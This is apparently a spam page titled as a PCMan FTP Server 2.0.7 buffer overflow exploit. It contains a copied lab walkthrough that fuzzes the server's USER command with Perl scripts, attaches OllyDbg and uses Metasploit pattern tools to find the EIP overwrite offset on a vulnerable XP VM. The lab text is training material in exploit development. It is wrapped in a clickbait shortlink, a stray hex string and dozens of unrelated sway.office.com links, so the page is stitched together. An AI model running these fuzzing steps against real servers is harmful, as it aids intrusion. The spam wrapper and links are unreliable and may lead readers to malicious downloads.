PCMan’s FTP Server 2.0.7 ? Buffer Overflow Exploit __FULL__
Click Here >>> https://bltlly.com/2t2BFi
PCMan is OnlineNote(FYI):Notice the FTP Server is online.I apologize for the repetitive starting and stopping of the FTP Server. Open fuzzer1.pl with leafpad (On Kali 1.0.5)Instructions:cd /var/tmp/BUFFER/PCManleafpad fuzzer1.plNote(FYI):Arrow #1, Use (cd) to navigate to the (/var/tmp/BUFFER/PCMan) directory.Arrow #2, Use (leafpad) to open (fuzzer1.pl). Leafpad is a simple GTK+ based text editor. The user interface is similar to Windows(tm) notepad. Explain fuzzer1.pl (Command Line Arguments) (On Kali 1.0.5)Instructions:Select Options and Check Word Wrap and Line Numbers.Scroll Down to Line 17Note(FYI):Arrow #2, The script (fuzzer1.pl) take in three command line arguments: IPADDRESS, PORT and COUNT.Eg., ./fuzzer1.pl 192.168.2.106 21 2020IPADDRESS - Is the IP Address associated with the attack vector.PORT - Is the Port associated with the attack vector server.COUNT - Is the number of character that will be sent to the particular IPADDRESS and PORT. Explain fuzzer1.pl Essential Variables (On Kali 1.0.5)Instructions:Arrow #1 [Line 37], The ($header) variable is composed of the string (USER) plus a single . The characters that come after the (USER ) string is the actual username. (Eg. JOHNDOE or AAAA[2200]AAAAs...)Arrow #2 [Line 42], The ($junk) variable will actually contain the username that will be supplied immediately after the $header. Ultimately, the $junk variable will used to overflow the USER variable within PCMan. Normal Usage: E.g.,USER JOHNDOEAb-Normal Usage: E.g., USER AAAA[2200]AAAA...Arrow #3 [Line 46], The ($string) variable contains the Hexademical representation for an A (e.g., x41) multiplied by the OFFSET_COUNT. In the below example, 2200 A's would be sent to PCMan. E.g., ./fuzzer1.pl 192.168.2.106 21 2200Arrow #4 [Line 49], The ($socket) variable is used to create a TCP connection to an $IPADDRESS over a $PORT.Arrow #5 [Line 53], The function $socket->send($string) is used to send the $string composed of (USER AAAA[2200]AAAA...) to the specified $IPADDRESS and $PORT.Arrow #6 [Line 57], The functionclose($socket) will close the TCP connection.Arrow #7, Click the icon to close leafpad. PCMan Fuzz Test (Part 1) (On Kali 1.0.5)Note(FYI):Replace (192.168.2.106) with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step 7).Instructions:cd /var/tmp/BUFFER/PCMan./fuzzer1.pl./fuzzer1.pl192.168.2.106 21 10./fuzzer1.pl192.168.2.106 21 100./fuzzer1.pl192.168.2.106 21 1000Note(FYI):Arrow #1, Use (cd) to navigate to the (/var/tmp/BUFFER/PCMan) directory.Arrow #2, Use (fuzzer1.pl) to see which parameters are required for the program to execute as designed. No buffer overflow will occur for (Arrows #3-#5). ./fuzzer1.pl./fuzzer1.pl192.168.2.1062110Arrow #3, Use (fuzzer1.pl) to send 10 A's to (192.168.2.106) over port 21.Arrow #4, Use (fuzzer1.pl) to send 100 A's to (192.168.2.106) over port 21.Arrow #5, Use (fuzzer1.pl) to send 1000 A's to (192.168.2.106) over port 21. Review of Initial Fuzzing Test (Part 1) (On Damn Vulnerable WXP-SP2)Instructions:Notice that 10's were sent and the User name is okay.Notice that 100's were sent and the User name is okay.Notice that 1000's were sent and the User name is okay.Note(FYI):Arrows #1-#3, The goal of fuzzing is to find out the following: (1) at what point will the application fail to work as designed, (2) at what point will the application crash, and (3) at what point will the application allow exploitation to occur. Accordingly, we are not at that point yet. Exit PCManInstructions:--> (See Picture)Click the Yes ButtonNote(FYI):It is really not necessary to exit PCMan at this point. The purpose of exiting is to clear the application input and output streams.
Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)Instructions:Right Click on PCMANFTPD2Click on Open PCMan is OnlineNote(FYI):Notice the FTP Server is online.I apologize for the repetitive starting and stopping of the FTP Server. Run OLLYDBGInstructions:Right Click on the OLLYDBG Desktop IconSelect Open Attach OLLYDBG to PCMan Process (Part 1)Instructions:File --> Attach Attach OLLYDBG to PCMan Process (Part 2)Instructions:Click on PCManFTPD2Click on the Attach ButtonNote(FYI):Arrow #1, Make sure PCManFTPD2 is highlighted in light gray.Arrow #2, OLLYDBG is an x86 debugger that will allow us to view and trace memory locations, registers, determine offsets, determine which DLLs are used, and a lot more. OllyDbg Views Briefly ExplainedNote(FYI):Arrow #1, The upper left window pain represents assembler instructions being executed by the program.Arrow #2, The lower left window pain provides a map of Memory to Hex to ASCII.Arrow #3, The upper right window pain represent registers that will help in our future buffer overflow interrogation.Arrow #4, The lower right window pain represents actual memory stack, which will be used in conjunction with the Structured Exception Handler (SEH) Chain. Start OllyDbgInstructions:Notice that OllyDbg is currently paused ().Click the Play Icon () and paused () will change to running ()Click PCMan located in the taskbar ()Note(FYI):Arrow #1, PCMan is kind of in a locked stated until the Play Icon is clicked.Arrow #3, You are asked to click on PCMan in the task tray to bring the PCMan application to foreground, so you can watch the subsequent buffer overflow attempts. Open fuzzer2.pl (On Kali 1.0.5)Instructions:leafpad fuzzer2.plNote(FYI):Arrow #1, Use (leafpad) to open (fuzzer2.pl). Leafpad is a simple GTK+ based text editor. The user interface is similar to Windows(tm) notepad. View fuzzer2.pl Standard InputInstructions:Select Options and Check Word Wrap and Line Numbers.Arrow #2 [Line 21], This is a sub routine called &get_info. It calls the program to move and execute the lines of code between 24 to 53.Arrow #3 [Line 27], The ($target) variable receives user input pertaining to the IP Address.Arrow #4 [Line 30], The ($port) variable receives user input pertaining to the Port Number.Arrow #5 [Line 33], The ($start_fuzz) variable receives user input pertaining to the starting number of characters sent to the PCMan USERNAME. (E.g., Start at 2000 AAAA's).Arrow #6 [Line 36], The ($end_fuzz) variable receives user input pertaining to the ending number of characters sent to the PCMan USERNAME. (E.g., End at 3000 AAAA's).Note(FYI):Arrows #2-6, is a perl function used in this method to receive user input data from the keyboard. Explain fuzzer2.pl (&comment Sub Routine)Instructions:Arrow #1 [Line 40], IF any of the variables $target -or- $port -or- $start_fuzz -or- $end_fuzz are blank, THEN display usage and exit the program.Arrow #2 [Line 51], IF the above statement in Line 40 is FALSE, THEN execute the &commence sub routine.Arrow #2 [Line 51-60], Send the following variables ($target,$port,$start_fuzz,$end_fuzz) to Line 55. Note(FYI):Arrows #3, Notice the following:$target in Line 51 is received $target in Line 57.$port in Line 51 is received $port in Line 58$start_fuzz in Line 51 is received $start_fuzz in Line 59$end_fuzz in Line 51 is received $end_fuzz in Line 60 Explain fuzzer2.pl (While Loop and Time Out)Instructions:Arrow #1 [Line 71], Keep the program running inside of the while loop, IF a socket can still be establish to the IP/Port -AND- IF the $end_fuzz count has not been exceeded. The ($end_fuzz) is the amount of characters that you want the program to stop at you were unable to crash the program.Arrow #2 [Line 75], Create a network TCP socket to IP($target) and Port($port). The timeout is set to 1 second. It also correspond to my alarm on line 83.Arrow #1 [Line 77,81-83], The ($buff_num) is the number of characters we previously sent the application. If the socket times out, then we gently send a signal (Line 83) to print (Line 82) that the application crashed. Note(FYI):Arrows #1-4, The purpose of explaining the code is so you become proficient at understanding how something works (whether it is primitive or not), as opposed to only being a tool jockey. It's nice to have the ability and confidence to write your own vulnerability scanner, before having to wait the next day or paying big bucks to somebody else. Explain fuzzer2.pl (Socket Determination)Instructions:Arrow #1 [Line 92], IF a TCP socket was established to IP($target) and Port($port), THEN execute Lines 92 to 101.Arrow #2 [Line 100], Send the IP($target), Port($port), and the FUZZER_COUNT($num) to the fuzzer sub routine.Arrow #2 [Line 92,102-109], IF a TCP socket was NOT established to IP($target) and Port($port), THEN exit the program. Explain fuzzer2.pl (Send Fuzzer String)Instructions:Arrow #1[Line 122-124], Variables $target, $port, and $fuznum received arguments from the sub routine &fuzzer($target,$port,$num).Arrow #2[Line 126], Assign the $header variable to "USER ".Arrow #3[Line 130-132], Assign the $socket variable to the IP($target) and Port($port). IF the $socket was created, THEN move into the first set of curly braces{}.Arrow #4[Line 134], Assign the $exploit variable to the product of the hexadecimal value for A(x41) multiple by the $fuznum. So, if the $fuznum is 2200, then there would be 2200 A's(41) assigned to the $exploit variable.Arrow #5[Line 135], Assign the $string variable to "USER AAAAAA....".Arrow #6[Line 137], Print or Send the $string to the $socket. This is the line that will eventually cause a buffer overflow.Arrow #7 [Line 132,147-153], IF the $socket was not created, THEN exit the program.Click the icon to close leafpad.Note(FYI):Arrows #1-6, The purpose of this function is to test how many characters sent to the PCMan USER variable is requiredto crash the application. PCMan Fuzz Test using fuzzer2.pl (On Kali 1.0.5)Note(FYI):Replace (192.168.2.106) with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step 7).Instructions:./fuzzer2.plEnter IP Address:192.168.2.106Enter Port Number: 21Enter Fuzz Start Number: 1999Enter Fuzz Stop Number: 2020My crash number is2001, record your crash numberNote(FYI):Arrow #1, Use (fuzzer2.pl) to sequentially enumerate several buffer overflow attempts, until PCMan crashes, in which OllyDbg will fail back to Paused Mode.Arrow #4-#5, The start (1999) and Stop (2020) Fuzz numbers where derived from Master Peleus' article.Arrow #6, In my case, the fuzzer was unable to communicate with PCMan after sending 2001 A's (ie., A = x41). Viewing OllyDbg Results (On Damn Vulnerable WXP-SP2)Instructions:Notice that OllyDbg is currently paused () because PCMan crashed.Notice the EBP register that contains the string (41410002).See below Note(FYI) section for EPI details.Note(FYI):Arrow #2, The EBP is a non-volatile general-purpose register that has two distinct uses depending on compile settings: (1) it is either the frame pointer or a (2) general purpose register. EBP keeps track of where the stack is at the beginning of a function. In case, you can see it was storing 2 bytes of AA's(41 41 00 02).Arrow #3, The EIP register always contains the address of the next instruction to be executed. Our goal over the next sections is to determine the exact offset so we can control what is placed in the EIP. If we can accomplish this task, then we have a high probability to be able to later tell the EIP (ie the pointer to the next instruction) to execute our shell code instead of the application immediately crashing. :-) Copy the EIPInstructions:Left Click to Highlight, then Right Click on the EIPClick Copy selection to clipboardClick the Close Icon (). Using pattern_offset.rb (On Kali 1.0.5)Note(FYI):Replace (0012FE44) with your EIP value obtained in the previous step. You should be able to paste if you have VMware Tools installed.Instructions:/usr/share/metasploit-framework/tools/pattern_offset.rb0012FE44Notice the Offset was not found.Note(FYI):Arrow #1, Use (pattern_offset.rb) to "try" to determine the exact length of the EIP address (0012FE44). Remember the offset is number of bytes necessary to occur before the EIP would be over overwritten.Arrow #2, No exact matches will occur because the address is invalid. Accordingly, the following section will teach you how to determine the offset, using a valid address. Section 12: PCMan Fuzz Test Using pattern_create.rb and pattern_offset.rbSection NotesNotes(FYI):The previous section provided you with a very primitive way to determine how many character it takes to crash PCMan. However, just opening up the virtual fire hose and pointing it at an application is not accurate enough to determining the buffer offset.Fortunately, the Metasploit framework has two sister tools (pattern_create.rb and pattern_offset.rb) that allow usprecisely determine which 4 bytes will overwrite the EIP. PCMan Fuzz Test (On Kali 1.0.5)Instructions:/usr/share/metasploit-framework/tools/pattern_create.rb 2200 | tee pattern.txtls -l pattern.txtNote(FYI):Arrow #1, Use (pattern_create.rb) to create a unique pattern of 2200 characters. Instead of sending all (A's) to crash PCMan, we will send this unique string instead. The result value contained in the EIP register can then be used with pattern_offset.rb to determine the exact offset. Use (tee) to display the output and place that output in a file call (pattern.txt).Arrow #2, Use (ls -l) to display the files general information (privileges, ownerships, byte size, last update and name). Open fuzzer3.pl (On Kali 1.0.5)Instructions:leafpad fuzzer3.plNote(FYI):Arrow #1, Use (leafpad) to open (fuzzer3.pl). Leafpad is a simple GTK+ based text editor. The user interface is similar to Windows(tm) notepad Explain fuzzer3.pl (Command Line Arguments)Instructions:Select Options and Check Word Wrap and Line Numbers.Arrow #2 [Line 17-18], Assign $IPADDRESS and $PORT to their corresponding command line arguments.Arrow #3, [Line 20-27], IF either $IPADDRESS -or- $PORT was not provided via the command line, THEN exit the program. Explain fuzzer3.pl (Does pattern.txt Exist)Instructions:Arrow #1 [Line 30-38], IF the file (pattern.txt) that you created in (Section 12, Step 1) does not exit, THEN exit the program.Arrow #2, [Line 46], Assign the ($header) variable to "USER". In order to provide a username to a FTP server (ie PCMan), you must first specify the string (USER) followed by a and then the actual username. E.g., (USERJOHNDOE)Arrow #3, [Line 52], Use (cat) to assign the ($junk) variable to the entire string of characters located in the file (pattern.txt). The ($junk) variable will actually be the fake username that will follow the header string(USER).E.g., $junk = "Aa0Aa1Aa2Aa3Aa4..." Arrow #4, [Line 56], Assign the ($string) variable to contain the combination of the ($header) variable with the ($junk) variable appended.E.g., (USERAa0Aa1Aa2Aa3...) View fuzzer3.pl (Establish Socket, Send Data)Instructions:Arrow #1 [Line 59], Establish a TCP Network Socket Connection and assign to the ($socket) variable.Arrow #2, [Line 63], Use $socket->send($string) to send the ($string) variable to the $socket TCP Network Connection. Arrow #3, [Line 63], Use close($socket) to close the $socket TCP Network Connection.Click the icon to close leafpad. Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)Instructions:Right Click on PCMANFTPD2Click on Open PCMan is OnlineNote(FYI):Notice the FTP Server is online.I apologize for the repetitive starting and stopping of the FTP Server. Run OLLYDBGInstructions:Right Click on the OLLYDBG Desktop IconSelect Open Attach OLLYDBG to PCMan Process (Part 1)Instructions:File --> Attach Attach OLLYDBG to PCMan Process (Part 2)Instructions:Click on PCManFTPD2Click on the Attach ButtonNote(FYI):Arrow #1, Make sure PCManFTPD2 is highlighted in light gray.Arrow #2, OLLYDBG is an x86 debugger that will allow us to view and trace memory locations, registers, determine offsets, determine which DLLs are used, and a lot more. Start OllyDbgInstructions:Notice that OllyDbg is currently paused ().Click the Play Icon () and paused () will change to running ()Click PCMan located in the taskbar ()Note(FYI):Arrow #1, PCMan is kind of in a locked stated until the Play Icon is clicked.Arrow #3, You are asked to click on PCMan in the task tray to bring the PCMan application to foreground, so you can watch the subsequent buffer overflow attempts. PCMan Fuzz Test Using fuzzer3.pl (On Kali 1.0.5)Note(FYI):Replace (192.168.2.106) with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step 7).Instructions:./fuzzer3.pl192.168.2.106 21Note(FYI):Arrow #1, Use (fuzzer3.pl) to send the unique string of 2200 characters created by pattern_create.rb to PCMan. Viewing OllyDbg Results (On Damn Vulnerable WXP-SP2)Instructions:Notice that OllyDbg is currently paused () because PCMan crashed.Notice that both the ESP and ESI register points to strings that contain a bunch of unique junk.Left Click on the EIP Value, Right Click to popup a menu.Copy Selection to clipboard.Click the Close Icon ().Note(FYI):Arrow #3-4, Make sure you copy your EIP value instead of mine. It's very possible that yours will be different. Open NotepadInstructions:Click the Start ButtonAll Programs --> Accessories --> Notepad Paste EIP ValueInstructions:Edit --> Paste Save FileInstructions:File --> Save As...Navigate to the following FolderC:\BUFFER\PCManFile name: eip_value.txtClick the Save ButtonNote(FYI):We are saving the address just encase you are unable to paste it in the next step. Using pattern_offset.rb (On Kali 1.0.5)Note(FYI):Replace (386F4337) with your EIP value obtained in the previous step. You should be able to paste if you have VMware Tools installed.Instructions:/usr/share/metasploit-framework/tools/pattern_offset.rb386F4337Record your Offset. In my case, it is 2003.Note(FYI):Arrow #1, Use (pattern_offset.rb) to determine the exact length of the EIP address (386F4337).Arrow #2, Make sure you record your offset. It is important to note that2003 bytes occur (in my case) before the EIP can be overwritten. 2b1af7f3a8
https://sway.office.com/1pt5QEJq20zsSHMM
https://sway.office.com/CAgjlWlZS23AJEZQ
https://sway.office.com/aqk4llkfMS0KCIoB
https://sway.office.com/W8SCvTibcGMhA9GZ
https://sway.office.com/NdEL8mIU36oCACbR
https://sway.office.com/lNwMSiiVvasPcuLE
https://sway.office.com/4OrzoPNnPR4Unkvt
https://sway.office.com/oEQYK7qylyc7G451
https://sway.office.com/fhEz1g776X8banCE
https://sway.office.com/2qGYDNyQBRwWEXk0
https://sway.office.com/yu44PZKtPoYeFmAP
https://sway.office.com/WoCC0FLn1m4G17JK
https://sway.office.com/V3MTlu9xdWAcF0mq
https://sway.office.com/IwXB0fAuaxOhyLFu
https://sway.office.com/M3JMg9D6zA7pGcas
https://sway.office.com/4bBxXSV9bEvQpDBR
https://sway.office.com/kpRjuCwQdGrf39NH
https://sway.office.com/yAtyhH77JiMeh02Z
https://sway.office.com/ceenH81fwl3GFYyQ
https://sway.office.com/2r2uepWk7abw25Hp
https://sway.office.com/iMsC5nuFT0y0s3eP
https://sway.office.com/aMELO5qpmt3QtH5A
https://sway.office.com/sbEFruKwBbvfdgsd
https://sway.office.com/QG13n63Q3uiFhpF4
https://sway.office.com/xPJzzIzuQ9GkHNDd
https://sway.office.com/POKo4t1PBF08CgGR
https://sway.office.com/ZIV7OKDXkJL8TvFj
https://sway.office.com/KtqomP3TERWb5Oyu
https://sway.office.com/2Y3ljpokAh4MuJrS
https://sway.office.com/Zr1DtQzQEG52LAY9
https://sway.office.com/dQyM3tI34L6nledU
https://sway.office.com/ZxZHiJILKUd89NM2
https://sway.office.com/6wvzAp2tEIo8pJZ7
https://sway.office.com/zuLTFqFefpMqp2tB
https://sway.office.com/jVpNAAhAj23sTEms
https://sway.office.com/KoWMPoLbwjq5jnBS
https://sway.office.com/Gr9C6DD6MAZ9tnqi
https://sway.office.com/bEcjVPaQ2GtJRt5y
https://sway.office.com/cPc4Q4mH7vAkvatS
https://sway.office.com/lF0kjbUSqUAMGqEW
https://sway.office.com/IaZW0LnESTkFQBW3
https://sway.office.com/owIpSdUUTKgQUTa1
https://sway.office.com/gwY66VIeXWNl1RYR
https://sway.office.com/xoDoKobw3IIBqC6H
https://sway.office.com/Iv9QYtkGO1ogREnB
https://sway.office.com/vsHatINOcGmYoVXb
https://sway.office.com/ZGuffTLou9G5bm6I
https://sway.office.com/GTzEmm2xBbsG5vdH
https://sway.office.com/l5X2BFAZQRIyTucU
https://sway.office.com/pDE5u1E1kxENJecM
https://sway.office.com/lcDvaP4TWXnY6gzT
https://sway.office.com/0Aak9R1pI5McNDnv
https://sway.office.com/YvA8ImbNqDxLK9qa
https://sway.office.com/ESGDYtGppDLfRiJc
https://sway.office.com/pyC2fZ8yBuknsitU
https://sway.office.com/U7DC9d3DnHmJ1kcb
https://sway.office.com/UEe4IexlgrvovCyb
https://sway.office.com/OoVTdD4xbC4ymf5A
https://sway.office.com/rVp5tPfP60KzogXT
https://sway.office.com/aJMB4SoZBDjAXMUy
https://sway.office.com/3kV2E7qDooEHzdSH
https://sway.office.com/0by1rG3NocJDZCKP
https://sway.office.com/SJgZZStm7TI01R1w
https://sway.office.com/S9MpCgGoPJkpDbRp
https://sway.office.com/DBVAqkVzncx55xQH
https://sway.office.com/oyVJLuL6JdfFQ2We
https://sway.office.com/1DJnVDF4Lvy3ZbWq
https://sway.office.com/lCbswOG94alqaJ2n
https://sway.office.com/c0lVKxNUZdLEmLZg
https://sway.office.com/0a5A7XkD2erUjM3D
https://sway.office.com/A48MkIcBu6xJzsnl
https://sway.office.com/BnYCPlMTfBSPSw5L
https://sway.office.com/QzO2XgMg2l4FisyM
https://sway.office.com/x6oevAJ08GfZOFVM
https://sway.office.com/IBIF0p9pYr5ktmMM
https://sway.office.com/H9bhj3fAhaHMEM0P
https://sway.office.com/7nDXhhAcWFBjQwkB
https://sway.office.com/bHjSg7OhnJBBZs6p
https://sway.office.com/1IOvQeAMud5rbcYU
https://sway.office.com/hmETtJuMB5kgR3Ml
https://sway.office.com/ljqDsgzeVygkShNp
https://sway.office.com/oVlA5DfrUdVqJL9P
https://sway.office.com/UMdcEkHZFIG7jjyD